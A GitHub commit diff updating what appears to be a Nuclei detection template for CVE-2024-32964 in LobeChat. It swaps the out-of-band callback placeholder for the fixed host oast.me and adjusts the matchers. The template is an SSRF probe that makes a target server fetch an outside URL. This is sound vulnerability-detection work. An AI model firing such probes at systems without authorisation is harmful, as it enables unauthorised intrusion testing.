Update CVE-2024-32964.yaml

patch-12
Ritik Chaddha 2024-10-05 12:43:12 +04:00 committed by GitHub
parent 113e39ce90
commit e3b37bfe03
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 4 additions and 4 deletions

View File

@ -38,7 +38,7 @@ http:
matchers:
- type: dsl
dsl:
- 'contains(body, "Welcome to LobeChat")'
- 'contains(tolower(body), "lobechat")'
- 'status_code == 200'
condition: and
internal: true
@ -49,10 +49,10 @@ http:
Host: {{Hostname}}
Content-Type: text/plain
http://{{interactsh-url}}
http://oast.me
matchers:
- type: word
part: interactsh_protocol
part: response
words:
- "http"
- "<h1> Interactsh Server </h1>"